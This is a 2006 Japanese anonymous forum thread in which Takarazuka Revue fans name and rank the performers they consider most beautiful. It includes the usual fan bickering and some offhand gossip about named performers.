167 :名無しさん@花束いっぱい。:2006/11/09(木) 13:31:32 ID:2kJCmsZ5
昨日生王子見たけど美しかったよ

168 :名無しさん@花束いっぱい。:2006/11/09(木) 16:37:35 ID:Rz3G11Ls
眉月凰。ホントに綺麗な人だと思う。

169 :名無しさん@花束いっぱい。:2006/11/09(木) 20:51:06 ID:nMrEFrLm
>>165
2人とも口が大きいね

170 :名無しさん@花束いっぱい。:2006/11/09(木) 21:34:33 ID:o2Kgvw5m
すいません、王子って誰ですか?
「宝塚 愛称 王子」で検索しても良くわからない〜。

171 :名無しさん@花束いっぱい。:2006/11/09(木) 23:08:29 ID:I5WZXD8a
花組の眉月さんだと思います

…だよね??

172 :名無しさん@花束いっぱい。:2006/11/09(木) 23:42:23 ID:0aq7dOAO
花組 眉月=王子、ともよ

173 :名無しさん@花束いっぱい。:2006/11/10(金) 00:25:51 ID:doAF5cxW
もう決して若くないしフリなんだけど 轟さんは本当に美しいと思います 壇さんもゴージャス美人ですね!

174 :名無しさん@花束いっぱい。:2006/11/10(金) 00:29:23 ID:XlWh26BY
タカコは、綺麗な細長い人やなーと思った事はあるけど
美人な人やなーと思った事は一度も無い。

175 :名無しさん@花束いっぱい。:2006/11/10(金) 00:37:21 ID:SRudkYOZ
かしちゃん。
こんな人が宝塚にいるんだーってびっくりした。

176 :名無しさん@花束いっぱい。:2006/11/10(金) 01:11:18 ID:suhltGUy
美牧冴京タン。 俺、ケコンチタイアルネ! (^-^)

177 :名無しさん@花束いっぱい。:2006/11/11(土) 15:52:48 ID:J47w9HgV
王子も美人だけど、花組は路線スターがもの凄い素顔美人揃い。
男役も娘役も。

男役:真飛・壮・愛音
娘役:桜乃・華耀

このメンツに囲まれるベテラン男1…。
舞台はともかく素顔だとどうしても見劣りする気が…。
VISA新CMのビジュアルも面白過ぎだったし…。

178 :名無しさん@花束いっぱい。:2006/11/11(土) 16:01:01 ID:+LvbZ4TN
オサは笑顔は絶品

179 :名無しさん@花束いっぱい。:2006/11/11(土) 16:54:08 ID:45K5jV2Q
貴城、大和、壮

180 :名無しさん@花束いっぱい。:2006/11/11(土) 17:34:20 ID:u4AHUQGb
眉月凰!!!!!

181 :名無しさん@花束いっぱい。:2006/11/11(土) 20:21:46 ID:W3cD69ge
タニちゃん 人を惹きつける 華やかさは 随一
目元パッチリ チャーミングなエクボ いつもキラキラ
まぶしくて ステキ

182 :名無しさん@花束いっぱい。:2006/11/11(土) 20:24:34 ID:W3cD69ge
タニちゃん 人を惹きつける 華やかさは 随一
目元パッチリ チャーミングなエクボ いつもキラキラ
まぶしくて ステキ

183 :名無しさん@花束いっぱい。:2006/11/11(土) 20:59:06 ID:CqF3b9vq
ともよちゃん美しすぎる。

184 :名無しさん@花束いっぱい。:2006/11/11(土) 23:27:26 ID:Vx75Xx/8
かしげ

まだ宝塚観始めた頃、宝塚にも美人ているんだーと思った。


185 :名無しさん@花束いっぱい。:2006/11/11(土) 23:36:42 ID:J47w9HgV
宙組はトプからして美人率高いとオモ。

男役:貴城・大和・早霧・凪七。
娘役:何と言っても花影アリス。 

近い将来、
花組:まと&あやね
宙組:タニ&アリス
の同期で美形同士のコンビになる予感。
そういうの劇団が好きそう。
それぞれ顔のサイズも揃ったコンビになるし。

186 :名無しさん@花束いっぱい。:2006/11/11(土) 23:45:22 ID:+LvbZ4TN
初嶺磨代も結構美形よ

187 :名無しさん@花束いっぱい。 :2006/11/11(土) 23:50:25 ID:D1x2P38S
みっちゃんbijinだお。

188 :名無しさん@花束いっぱい。:2006/11/11(土) 23:56:22 ID:kqgizj3S
水さんかな。

189 :名無しさん@花束いっぱい。:2006/11/12(日) 00:15:15 ID:uVhr7Cmr
187、188はスレ違いかと。

190 :名無しさん@花束いっぱい。:2006/11/12(日) 00:16:21 ID:FpCcUioG
平安時代には 麻樹ゆめみ&葵吹雪 のような人が好まれた。

191 :名無しさん@花束いっぱい。:2006/11/12(日) 01:20:37 ID:B6MIF0k8
眉月凰さんはめっちゃ綺麗!

192 :名無しさん@花束いっぱい。:2006/11/12(日) 09:37:36 ID:OjbbM2oK
月組も、美形ぞろいじゃないか?
男役→麻子、きりやん、あひ、マギー、まさお、みりお
娘役→かなみ、おときち、こころ、彩橋みゆ、りんか、れみ、ねね
まだまだ居るぞ〜

193 :名無しさん@花束いっぱい。:2006/11/13(月) 22:58:41 ID:o196XTy/
>>192
組ファンにとっての美形は、組ファン以外には美形じゃないことが多い。
そのいい例ですね。好みを抜いたら半分以上美形じゃない。
私の好みを入れたら8割美形だけどw

194 :名無しさん@花束いっぱい。:2006/11/13(月) 23:33:28 ID:ukP5yyY4
192サンに
わたしは同意。月は綺麗な子多いよね。

195 :名無しさん@花束いっぱい。:2006/11/13(月) 23:59:59 ID:8OATkRtk
>192

ほたるは?
美人の筆頭だと思うんだが

196 :名無しさん@花束いっぱい。:2006/11/14(火) 00:51:48 ID:73K15p5J
ほたるサンは最近老けたし、舞台で存在感なさすぎ。

197 :名無しさん@花束いっぱい。:2006/11/14(火) 02:35:57 ID:5j65tUHQ
>>192
その名前の一覧は、勿論舞台の上での話だよね?

198 :名無しさん@花束いっぱい。:2006/11/14(火) 15:03:42 ID:rdhdwKXK
宝塚グラフ見て思ったスッシーは美人だと思う。
キレイにパーマかけたらいい女だよね?

199 :名無しさん@花束いっぱい。:2006/11/14(火) 19:45:41 ID:e3bZD2se
綺華れいさん

小雪・春香・冨永愛を足して割ったような美人だね
みんなモデルだわ・・

200 :名無しさん@花束いっぱい。:2006/11/14(火) 20:17:45 ID:JPStd8rA
個人的順位

1位 貴城けい
2位 早霧せいな
3位 真飛聖

201 :名無しさん@花束いっぱい。:2006/11/14(火) 20:21:53 ID:2q7Mvtci
きりやんが一番!

202 :名無しさん@花束いっぱい。:2006/11/14(火) 20:38:52 ID:kaxbwJ/U
個人的順位

1位 王子
2位 まとぶん
3位 理事

203 :名無しさん@花束いっぱい。:2006/11/14(火) 20:45:58 ID:N909qapU
個人的順位 1 理事 2 眉月 3 壇

204 :名無しさん@花束いっぱい。:2006/11/14(火) 20:53:46 ID:W+Z6y8lY
個人的順位 1 理事 2 かしげ 3 タモ

205 :名無しさん@花束いっぱい。:2006/11/14(火) 21:14:49 ID:3uuiDnkT
綺華れいは始めて見たときヅカにこんな顔立ちの人がいたのかと驚いた。
個人的に王子は濃くて苦手…

206 :名無しさん@花束いっぱい。:2006/11/14(火) 21:28:42 ID:JPStd8rA
王子はズレなんでしょ?美人ズレっていいね

207 :名無しさん@花束いっぱい。:2006/11/14(火) 22:10:15 ID:3cY2tpRL
綺華ってすごいしゃくれ

208 :名無しさん@花束いっぱい。:2006/11/14(火) 22:46:35 ID:Lt+pAIeX
個人的順位

1轟さん 2一花ちゃん 3かしちゃん

209 :名無しさん@花束いっぱい。:2006/11/15(水) 00:17:36 ID:KKhVXWTX
おとめ見る限りじゃ美弥るりかって子が美人だと思う。
生とか舞台とかでは見たことないけど。

210 :名無しさん@花束いっぱい。:2006/11/15(水) 00:42:25 ID:s/QS7LZG
1 眉月 2 貴城 3 綺華


211 :名無しさん@花束いっぱい。:2006/11/15(水) 00:44:09 ID:rIinqDXR
高嶺、万里、轟、匠、貴城、檀、大和、紺野、綺華、妃鳳、明日海

212 :名無しさん@花束いっぱい。:2006/11/15(水) 04:14:44 ID:6pZunyZG
眉月凰・貴城けい

213 :名無しさん@花束いっぱい。:2006/11/15(水) 07:14:02 ID:CU4LRcgY
かしげ


でもどこが?って言われると分からない。
一つ一つのパーツを見ると美人な要素を持ってるとは思えない。
デコは広いし、輪郭も長い。
目も特別大きいわけじゃないし、口も大きい。
けど、美人だと思う。

214 :名無しさん@花束いっぱい。:2006/11/15(水) 10:37:19 ID:OpVHSkLs
目が綺麗だし形がいい
理事と檀ちゃんも同じケース

215 :名無しさん@花束いっぱい。:2006/11/15(水) 13:32:17 ID:OlYeMkW/
かしげはね、ポートなんかで見るよりは
実際目は大きいよ。
デコより口より目にインパクトあり。

216 :名無しさん@花束いっぱい。:2006/11/15(水) 16:13:43 ID:KIhNslzg
眉月凰と貴城けい
同期2大美女

217 :名無しさん@花束いっぱい。:2006/11/15(水) 21:39:13 ID:qrodIibg
いやいや、かしげさんデコもかなりのインパクトでしたよww
目が印象的なのはやっぱ理事さん。なんか、とにかくスゴイ。
写真で見たのとは違う、更に上をいくインパクトだった。まつげかな・・・?
とにかくすっごかった。

218 :名無しさん@花束いっぱい。:2006/11/15(水) 22:56:37 ID:32GtfJ08
オールバック、真正面ドアップを決める理事
ミキ以来の衝撃

ミキ ほさち 理事

219 :名無しさん@花束いっぱい。:2006/11/16(木) 00:01:19 ID:AY5wQiwC
本当に理事さんって美形だょね!造形が違うもんね!アッパレです

220 :名無しさん@花束いっぱい。:2006/11/16(木) 00:06:51 ID:bPCjiraU
はるひ。とにかく、意外にモテそうな美人系男役だよね。ベールかかってるて感じ。 (^o^)/

221 :名無しさん@花束いっぱい。:2006/11/16(木) 00:22:26 ID:Rcba8Su5
眉月凰さんと貴城けいさん。
二人はすっごく美しい!

222 :名無しさん@花束いっぱい。:2006/11/16(木) 00:25:44 ID:rkN7kVA7
眉月・貴城・檀
78期の3大美人。

223 :(-.-)y-~:2006/11/16(木) 00:45:17 ID:xHeSPiiV
眉月をシャープにしたら遼河になるんじゃないかと思われ。

224 :名無しさん@花束いっぱい。:2006/11/16(木) 00:47:39 ID:xHeSPiiV
カシゲを丸くちっこくしたらりさになりそう。 (^o^)/

225 :名無しさん@花束いっぱい。:2006/11/16(木) 01:00:59 ID:UMUZHvTD
理事
参りました、はい


226 :名無しさん@花束いっぱい。:2006/11/16(木) 01:18:53 ID:xHeSPiiV
りさだってオールバックにして男役を強調し始めたゾ。かいらしいの。

227 :名無しさん@花束いっぱい。:2006/11/16(木) 01:40:28 ID:TjXenQDZ
かしちゃんはポートで見てもメチャクチャ目デカいわ!

228 :名無しさん@花束いっぱい。:2006/11/16(木) 21:16:48 ID:/Ph1gwfW
かしげは目で笑うから、舞台で見ると細くなってあんまり大きく見えないんだよね。
でもたまにおどけたみたいに見開いた目はこぼれ落ちるんじゃないかってくらいにデカイ。
それに何かいつもキラキラしてるから涙成分の分泌量が多いんだろうなって思う。


229 :名無しさん@花束いっぱい。:2006/11/16(木) 23:28:17 ID:f3Yp/OV3
カシゲ、エッチの時は目がうるうるしててそそられるに違いない

230 :名無しさん@花束いっぱい。:2006/11/17(金) 01:54:14 ID:dgvhTSKa
禿+うるうる+ハスキーボイスはたまんねぇ。

かしげ 王子 あやか ちぎ
すなお タニ らんとむ ゆう

痩けて最近きりやんが美しく見えるのは錯覚か
あひは年々濃くなってきていやん。


231 :名無しさん@花束いっぱい。:2006/11/17(金) 09:13:44 ID:0M41ZEcH
きりやん私も綺麗になったと感じる!!

生徒で特別美人といえば、かしげ・ゆかり
こんな顔に生まれてみたかった

232 :名無しさん@花束いっぱい。:2006/11/17(金) 13:49:10 ID:MUG/3t4r
きりやん、PBやパソカレ表紙のアップ顔などを見ると、マジで美しいじゃん…と思うのですが…。


233 :名無しさん@花束いっぱい。:2006/11/17(金) 13:50:42 ID:oGwkZmXx
キリヤンは美人だよ…多分

234 :名無しさん@花束いっぱい。:2006/11/17(金) 17:27:09 ID:IpT51Vx8
世間でいう美人にはギリギリ入ると思うが
ファンがいうほど美人ではない
かしげ、理事、ゆかりのレベルと
タイプが違う
ファンは別館あたりで騒いでいてもいいが
2では適度にしないと笑われのがオチだよ

235 :名無しさん@花束いっぱい。:2006/11/17(金) 18:06:13 ID:TrgShdWy
いやあ〜、パソカレの表紙の理事!
このひとの綺麗度って何通りあるのだろうか?
アートですな。

236 :名無しさん@花束いっぱい。:2006/11/17(金) 22:59:22 ID:3f/JB9Zl
>235
モデルっぽくてジェンヌに見えないから個人的にはん〜だな
ジーンズショットの方が綺麗
つうか40?であの格好が似合う方が凄いw

237 :名無しさん@花束いっぱい。:2006/11/17(金) 23:06:58 ID:/5PNKcvA
綺華れいちゃん、貴城さん。綺華さんの妖しい女装もまた見たいけど入り出のオーラはタダ者じゃない感じでした。

238 :名無しさん@花束いっぱい。:2006/11/18(土) 10:28:25 ID:Ko8tJ4z1
>236
細かいことを言ってごめんね。イシちゃんはまだ39歳よ
しかし綺麗だ

239 :名無しさん@花束いっぱい。:2006/11/18(土) 22:50:26 ID:Umjs7hjd
美人なのは、眉月と貴城と綺華の三人だけです。

240 :名無しさん@花束いっぱい。:2006/11/19(日) 10:12:17 ID:mOXZxUEn
まとぶん
さえこ
かしげ
とうこ
タニ

が理想だったのにな
うまいこといかんな

241 :名無しさん@花束いっぱい。:2006/11/19(日) 11:41:25 ID:6wmwY7LU
みなさんさえこのどこがキレイにみえるんですか?

242 :名無しさん@花束いっぱい。:2006/11/19(日) 12:17:18 ID:Hk20P7qm
>>239
さりげなく王子をいれんなよwww

243 :名無しさん@花束いっぱい。:2006/11/19(日) 13:08:51 ID:PsoVYJXC
春野寿美礼は美人

244 :名無しさん@花束いっぱい。:2006/11/19(日) 13:19:58 ID:Zwe9hHDq
美人というより狐憑き色白女

245 :名無しさん@花束いっぱい。:2006/11/19(日) 15:03:38 ID:DpqXUJA6
キレイ(雰囲気?)と美人(元の目鼻顔立ち?)と美形(彫刻系?)って微妙に違うと思う〜
ジェンヌさんは全員キレイだし、美形は少し男っぽい轟さんのような顔立ちかな?

憧れる美人はココでもさんざん言われている、ゆかりちゃん、かしちゃん、檀ちゃんが自分の中の最強ベスト3

246 :名無しさん@花束いっぱい。:2006/11/19(日) 21:34:29 ID:uYluuAye
かし檀は確かに最強
二人の共通点は目が綺麗なところ?

247 :名無しさん@花束いっぱい。:2006/11/19(日) 21:59:12 ID:I/e+pGIY
かしげ檀眉月。ゆかりは美人だと思うけど憧れはしない。
後、OGであんまり名前挙がらないけど妃里。

248 :名無しさん@花束いっぱい。:2006/11/20(月) 01:58:05 ID:TW0byz25
貴 城 け い

249 :名無しさん@花束いっぱい。:2006/11/20(月) 02:40:22 ID:nZ26hB1Y
王子がいちばんだ!!!!!!

250 :名無しさん@花束いっぱい。:2006/11/20(月) 02:43:44 ID:4GxtA8uy
TOMOYO

251 :名無しさん@花束いっぱい。:2006/11/20(月) 12:21:58 ID:iNKjllu6
ここ少数のともよファン、張り付いてんの?

綺麗なのは認めるが良くも悪くも印象の薄い人だよ

252 :名無しさん@花束いっぱい。:2006/11/20(月) 13:05:47 ID:ge4jm+t7
嫌味言わずにスルーすれば平和なのにねぇ…
狭量ですこと。

253 :名無しさん@花束いっぱい。:2006/11/20(月) 21:10:26 ID:OAm/oi6/
>>251
美人ジェンヌスレなんだから、アンタも綺麗なの認めてるしいいんじゃねえの?
印象薄いとか関係ないし。

別に眉月ファソではないが。

254 :名無しさん@花束いっぱい。:2006/11/21(火) 00:26:57 ID:T8ZKkHBV
ともよちゃんは正真正銘の美人じゃない。印象薄いなんてかわいそう。
かしげちゃんやゆかりちゃんも美人だと思うよ〜。

255 :名無しさん@花束いっぱい。:2006/11/22(水) 08:45:01 ID:HpLaJiCl
ともよ・・・前スレではほとんど名前出てなかったのに
新スレに入って急に連続レスがつき続けてるから、不自然なんだよね。

美人だと思うジェンヌ
理事、檀、かしげ、ゆかり

256 :名無しさん@花束いっぱい。:2006/11/22(水) 17:15:12 ID:uhmfuJHq
貴城眉月綺華

257 :名無しさん@花束いっぱい。:2006/11/22(水) 19:58:31 ID:kUwCPR3M
誰かを、このスレの常連にしたくなくてわざと
ともよんの名前出してるだけのようなキガス。
ともよんのファンは、こんな所で
必死になったりしないよ。

258 :名無しさん@花束いっぱい。:2006/11/22(水) 20:54:12 ID:drj4rxSO
山科 綺華 貴城 檀

259 :名無しさん@花束いっぱい。:2006/11/22(水) 23:49:25 ID:C8zqHRCE
1理事 2遼河 3壇

260 :名無しさん@花束いっぱい。:2006/11/22(水) 23:51:38 ID:oJ9nDewF
前スレでは皆ただ単に眉月凰の存在を忘れてただけかと

261 :名無しさん@花束いっぱい。:2006/11/23(木) 01:04:14 ID:yH3+Pdai
未涼(小雪系)
瀬奈(向井亜紀系)
霧矢(浪花系)

262 :名無しさん@花束いっぱい。:2006/11/23(木) 01:06:42 ID:kwzp64c5
眉月凰は忘れてたけど、おとめで確認したら綺麗だったw
貴城けいも美人だわー。
なんとなーく似てるしなぁ。

263 :名無しさん@花束いっぱい。:2006/11/23(木) 05:31:41 ID:a/8/Crfi
檀ちゃん、かしちゃん、ともよちゃん、ゆかりちゃん…それくらいかな

264 :名無しさん@花束いっぱい。:2006/11/23(木) 06:34:43 ID:R8G0jDL5
王子は目ヂカラが足りないのよね。

265 :名無しさん@花束いっぱい。:2006/11/23(木) 07:41:12 ID:oMb4MchR
78期はビジュアル重視の年だったんだろうね。


266 :名無しさん@花束いっぱい。:2006/11/23(木) 10:17:38 ID:j1bseQ4u
美人ほど人気がないのはどうしてなんだろう

267 :名無しさん@花束いっぱい。:2006/11/23(木) 11:37:29 ID:vv05FkQL
眉月ってどんだけ忘れられたジェンヌよ?
顔面積広すぎるし。

268 :名無しさん@花束いっぱい。:2006/11/23(木) 13:41:42 ID:bbalz4qO
>>266
ここは、美  人  ス  レ
人気を語りたいなら別館で吼えといで。

269 :名無しさん@花束いっぱい。:2006/11/23(木) 18:11:26 ID:dLerRbST
余裕ないなぁ

270 :名無しさん@花束いっぱい。:2006/11/23(木) 18:31:03 ID:bbalz4qO
>>269
そう?親切で言ってあげてんだけど。
空気嫁てないみたいだから

271 :名無しさん@花束いっぱい。:2006/11/23(木) 20:10:28 ID:qBRjdf48
↑あなたのほうが、空気乱してる。

78期、美しいひと、多いかも。
やっぱり檀ちゃんがいちばん。
OGになるけど、涼風さんたちの期も、
つぶぞろいだったと思う。

272 :名無しさん@花束いっぱい。:2006/11/23(木) 20:43:00 ID:NtB5dTYY
266もかなり乱してるけどな。それは無視か?仲間かばってんのか?

273 :名無しさん@花束いっぱい。:2006/11/23(木) 21:08:50 ID:3wd6Y8bq
ぶさの方が親近感が湧くんだろうね。


274 :名無しさん@花束いっぱい。:2006/11/23(木) 22:15:47 ID:i9u1Rprz
貴城けい、大和悠河、轟悠、檀れい、大鳥れい、千ほさち

かな。

275 :名無しさん@花束いっぱい。:2006/11/23(木) 23:20:01 ID:vCnic1Yj
かしげが美人。
小さい頃からずっと可愛い&綺麗。
カシママが必死になるのもわかるよw

檀も綺麗。理事も。眉月も。

でも、たまに出てくるけどさえこが美人というのだけは解せない。
いわゆる造形美的な意味で「美人やな〜」って思ったこと無い。
雰囲気は綺麗だと思うけど。

タニも綺麗!って思ったこと無いな〜。顎長いし。
「凄くキラキラしてるな〜」って思う程度。
華とか存在感はあると思うけど、美人ではないと思う。

276 :名無しさん@花束いっぱい。:2006/11/23(木) 23:25:35 ID:DaEe/PFd
美人が人気が無いんじゃなくて
美人でオーラがある人がいないだけ
大人気だった
真央さんも、一路さんも、かなめちゃんも、ゆりちゃんも、みきちゃんも美人。
でも、今は美人はわざわざ宝塚に来ないで芸能界に行く
美人が入ってきても、芸があればさっさと退団して外部へ行く
結局残るのが外へいけないぶさか下手が残ったに過ぎない

277 :名無しさん@花束いっぱい。:2006/11/23(木) 23:29:45 ID:+YDxhKhA
かしげ家はお父さんまだ生きてる?あまり話題に上らないけど。

かしげはお父さんに似てるよね。

278 :名無しさん@花束いっぱい。:2006/11/23(木) 23:30:03 ID:PuLArhV5
天野サン、妃鳳サンとかわりと綺麗だけど使われない。
今は○価学会、金コネの世界で、、、、

279 :名無しさん@花束いっぱい。:2006/11/24(金) 00:18:49 ID:+FtQreOW
轟の綺麗っていう人はきっとオバンだな。
なんか綺麗ってか怖いってか古臭い。ラマ?

280 :名無しさん@花束いっぱい。:2006/11/24(金) 01:02:07 ID:8BkePEBf
娘役ではあやか、よしこ、檀、みどり、ほさちかな。娘一ではなかったけど、みこちゃん、確かに綺麗だった。
男役では、好き嫌いは抜きにして、理事、かしちゃん、ゆかりちゃん、せらちゃん、ともよさん、さえちゃんかな。
でも黒木さん、現役時代はリアルタイムで知らないけど綺麗だよね。
『綺麗なお姉さんが好き』な私は上にあげた美人娘役、皆、好きだわ。

281 :名無しさん@花束いっぱい。:2006/11/24(金) 02:39:55 ID:1BGCHgmC
>277
パーソナルブックにもちゃっかり載ってるパパ、もちろん今も健在だよ。
劇場にも現れてるし。
ただママのインパクトが強すぎて、パパの陰が薄いw

282 :名無しさん@花束いっぱい。:2006/11/24(金) 04:59:44 ID:dmwi4ezv
カシゲは頭皮まで父親似

283 :名無しさん@花束いっぱい。:2006/11/24(金) 07:44:03 ID:P6Nb8DgX
>280
きゃあ〜あなたとことごとく一緒!

284 :名無しさん@花束いっぱい。:2006/11/24(金) 23:27:57 ID:g22O/4sE
私は若いって言うわけでもないけど、おばさんでもないと思う23女ですが
普通に轟さんは美しいと思いますけど・・・。
年齢とか考えるとあのスタイルあの顔は、マジで羨ましいと思う。
でも、親近感は湧かない美人かと。
本人の前でわーキレイっていえなくて、本人がいなくなってからキレイだよなあって感心する感じ。

285 :名無しさん@花束いっぱい。:2006/11/25(土) 00:00:11 ID:GlLiy9rH
理事さんオーラを放ってますよね!凄くほそいけど 引き締まってて素敵です 美しいですね!

286 :名無しさん@花束いっぱい。:2006/11/25(土) 00:14:15 ID:SRyBC1Tz
ヨコだけど、理事、スキニーがメチャ似合ってた
あの下半身は裏山

理事も綺麗だけどやっぱりせらちゃんの綺麗さが忘れられない

287 :名無しさん@花束いっぱい。:2006/11/25(土) 01:50:03 ID:F5pPc4rq
凛華せらのホームページ見たらニッセンのモデルみたいになってる。
ヅカ時代のオーラが全く無くて残念・・・。

288 :名無しさん@花束いっぱい。:2006/11/25(土) 01:55:19 ID:nwUMVSN8
ニッセンのモデルを馬鹿にすんなw

289 :名無しさん@花束いっぱい。:2006/11/25(土) 02:14:03 ID:OctTXZvg
せらちゃん、芸能界っぽくなちゃったね。

290 :名無しさん@花束いっぱい。:2006/11/25(土) 07:49:47 ID:et/xAsJ2
>287
芸能人ではごくごく普通・・・
一番だと思っていたのにちょっとショック
宝塚だから一際綺麗に見えたのかもしれない
やっぱり宝塚も芸能界もインパクト美人の方が突出するのかも
黒木さん、ミキちゃん、檀ちゃん、轟さん・・・

291 :名無しさん@花束いっぱい。:2006/11/25(土) 09:22:34 ID:HTKnP0dC
綺華れいちゃん、きれいですよね

292 :名無しさん@花束いっぱい。:2006/11/25(土) 10:15:43 ID:HvpBul76
↑整形だからwww

293 :名無しさん@花束いっぱい。:2006/11/25(土) 12:36:56 ID:gpYub2cH
観劇歴20年
白城あやか 鮎ゆうき 檀れい 千ほさち 大鳥れい
歌劇グラフのポートに何度見とれたことか・・・。

男役ではすぐやめたけど、凛華せら! 眉月さん系のお顔で

294 :名無しさん@花束いっぱい。:2006/11/25(土) 12:58:03 ID:BnXHPmGD
娘役では
毬藻えり
鮎ゆうき
檀れい
大鳥れい
千ほさち
妃里梨江

男役では
貴城けい
凛華せら

造形が整ってるなぁと思うのは
高嶺ふぶき
轟悠
妃鳳こころ
美人通り越して、彫刻みたい。

295 :名無しさん@花束いっぱい。:2006/11/25(土) 15:52:20 ID:JwiiCHWx
飛行機事故でなくなった娘役、綺麗だったよね

296 :名無しさん@花束いっぱい。:2006/11/25(土) 15:59:10 ID:6ymwb1z/
78期の美人といえば
檀、かしげ、ゆうひくん、王子だな。

297 :名無しさん@花束いっぱい。:2006/11/25(土) 17:56:52 ID:DTJWgIz8
ドサクサにまぎれて、ゆうひはないだろう。
それと高嶺は普通だろ、彫刻は言いすぎだと...。

298 :名無しさん@花束いっぱい。:2006/11/25(土) 18:04:20 ID:erPb9D4n
私も、ゆうひはいかがなものかと思うけど、
このスレは個人的主観で書くことに制限はされてないので
ゆるしてやれ

299 :名無しさん@花束いっぱい。:2006/11/25(土) 18:12:50 ID:fA9vZinm
美人娘役率は昔の方が高いような感じ。

リアルタイムで知らない時代の娘役さん、写真見たら、美人多かった。美雪なんとかさんって人とか、それこそ、日航機墜落で亡くなられた北原遥子さんとか、そういえば、北原さん、黒木さん、毬藻えりさんとか、真矢さんの期の娘役さん、美人多いですね。
私が宝塚ファンになったのは94年辺りだけど、可愛いアイドル系とか、ファニーフェイスというかキャラクター系とか、雰囲気美人とかが目立ってきてて本当の美人娘役はあまり少なかったなあ。

非塚ファンの人達から美人と言われたのは、白城あやか、檀れい、千ほさちくらいかな。私も美人だと思った娘役はその三人プラス、ミドリとヨシコ、ファンなる少し前にやめた鮎さんと香坂千晶さん。94年以降の話ね。

あと、路線じゃないけど綺麗な娘役さんっていますよね。星組副組長の万里さんとか、あと、月組でも綺麗な娘役さん、いましたよね。あの人も真矢さんの期だったような。薄幸系の大人っぽい美人さん。名前は忘れたけど。


300 :名無しさん@花束いっぱい。:2006/11/25(土) 18:21:36 ID:fA9vZinm
追記、現役娘役で美人が誰も思い浮かばない。

舞台では、そこそこ綺麗だから、まあ、いいけどね。でも、有無を言わせず美しい人がいないのは、少し淋しい。

シャンテのDMでこのシーズンらしいゴージャスなファッショッンに身を固めた城咲あいちゃん、衣裳の割りに地味だったなあ。少し前のカジュアルなスタイルのがまだ良かった、それに華やかさは、前の華城季帆ちゃんのが合ったなあ。エビちゃん、彷彿させる感じで。
城咲ちゃん、舞台では映えるけど、素メイクは一般人レベルだと思った。

でも、こないだのクレオパトラは好きだったわ。

無意味にアゲてしまいました。

301 :名無しさん@花束いっぱい。:2006/11/25(土) 19:12:18 ID:BqCOLZFg
>299 舞希彩?

302 :名無しさん@花束いっぱい。:2006/11/25(土) 19:23:54 ID:fA9vZinm
ありがとうございます。そう、舞希さん。あの人も綺麗な人だったなあ。

私は洋画でも、芸能界でも宝塚でも綺麗な女優が大好き。

303 :名無しさん@花束いっぱい。:2006/11/25(土) 19:53:13 ID:gZq/+MW3
観劇暦2年弱の私は、かしげさん、ゆかりさんあたりの現役しかわからず。

304 :名無しさん@花束いっぱい。:2006/11/25(土) 22:21:23 ID:yEOG34OD
今綺麗な娘役が使われてないだけかなーと思う。
スタイル良いかも知れないけど、華城さんよ城咲さんとか
本当にブスさんだと思う。

305 :名無しさん@花束いっぱい。:2006/11/25(土) 23:21:09 ID:NetEtoVI
304
二人とも鼻が駄目だよね。美人の基準は目じゃないんだよね。

306 :名無しさん@花束いっぱい。:2006/11/26(日) 00:41:46 ID:8jNz0nxG
黒蜥蜴の麻実れいさん。
何だあれは。
老いのかげりさえスパイスとする美貌にひれ伏しました。


307 :名無しさん@花束いっぱい。:2006/11/26(日) 03:31:42 ID:F0x8cTHr
かし、ともよ、ゆかり!

308 :名無しさん@花束いっぱい。:2006/11/26(日) 16:43:03 ID:oQMsC3Tc
貴城けい

309 :名無しさん@花束いっぱい。:2006/11/26(日) 16:51:55 ID:KbIv1hAj
かしちゃん綺麗だと思うけど、芸能界は、あの程度のお顔じゃ無理だなー。
まあ元トップという肩書きで何とかやれそうだけど・・・。

310 :名無しさん@花束いっぱい。:2006/11/26(日) 16:53:22 ID:oQMsC3Tc
水夏希

311 :名無しさん@花束いっぱい。:2006/11/26(日) 18:26:58 ID:DQOvVD/6
綺華れい

312 :名無しさん@花束いっぱい。:2006/11/26(日) 21:07:51 ID:iO9VeFRO
水夏希はKABA.似の不細工
ゆうひくんは大塚愛に似ていて美人

313 :名無しさん@花束いっぱい。:2006/11/26(日) 21:11:26 ID:oQMsC3Tc
水夏希はイケメン

314 :名無しさん@花束いっぱい。:2006/11/26(日) 21:34:02 ID:oQMsC3Tc
水夏希はイケメン
美男
ダンス上手い
天才
鼻が新幹線

315 :名無しさん@花束いっぱい。:2006/11/26(日) 21:37:03 ID:oQMsC3Tc
まほろばと同棲してた過去

316 :名無しさん@花束いっぱい。:2006/11/26(日) 22:00:03 ID:FE4nRv6c
女ざかりの20代限定で好き嫌いは別だけど羨ましい美人ジェンヌは、

娘役⇒大月さゆ・白羽ゆり・アリス
男役⇒綺華れい・かなめ・早霧せいな

317 :名無しさん@花束いっぱい。:2006/11/26(日) 22:05:56 ID:v/2Xs9ar
>>313〜315
くるばしょ間違えていませんか?
ここは美人スレ

318 :名無しさん@花束いっぱい。:2006/11/26(日) 22:16:42 ID:LrytyfAK
かしちゃんって、目自体もデカイけど、黒目も
すごく大きいから美人さんなんじゃない?

319 :名無しさん@花束いっぱい。:2006/11/26(日) 22:24:42 ID:UaTAjJ4x
かしちゃん美人だとは思うけど、
あのおでことか、変に飛び出て見える目とか、
何かバランス悪くない?

320 :名無しさん@公演中:2006/11/26(日) 22:59:06 ID:TT8kujrL
髪をアップにしたドレス姿の真央さんは、美しすぎ!特に横顔!
おでこから長い首にかけて、ラインの美しさは天下一品!ここまで美しい女優さんいませんね〜



321 :名無しさん@花束いっぱい。:2006/11/26(日) 23:08:48 ID:N4ib2dPT
和涼華

322 :名無しさん@花束いっぱい。:2006/11/26(日) 23:17:30 ID:O3r4JZBG
宝塚史上NO.1

綺麗な人って誰なんだろう?

323 :名無しさん@花束いっぱい。:2006/11/26(日) 23:20:06 ID:wu1QSb4F
綺麗=美人ではない

324 :名無しさん@花束いっぱい。:2006/11/26(日) 23:23:59 ID:YmifB97j
有馬稲子・北原瑶子・北原千琴・・・は
どこからみても綺麗だったみたい。


325 :名無しさん@花束いっぱい。:2006/11/27(月) 02:48:25 ID:FINbNCmI
貴城、檀、眉月、綺華

326 :名無しさん@花束いっぱい。:2006/11/27(月) 11:44:23 ID:wyi7loz6
美人だなと思うのは、かしちゃん。

身近で見て、わ・・・綺麗だと思ったのは柊 巴さん。
舞台やCSを見ても余り感じなかったけど、素顔、とっても綺麗でした。

327 :名無しさん@花束いっぱい。:2006/11/27(月) 13:42:03 ID:R1Ts2925
植田イベント稽古場みて美少年が居ると思ったらユカリだった。舞台と雰囲気ちがうけど美人さんだね。

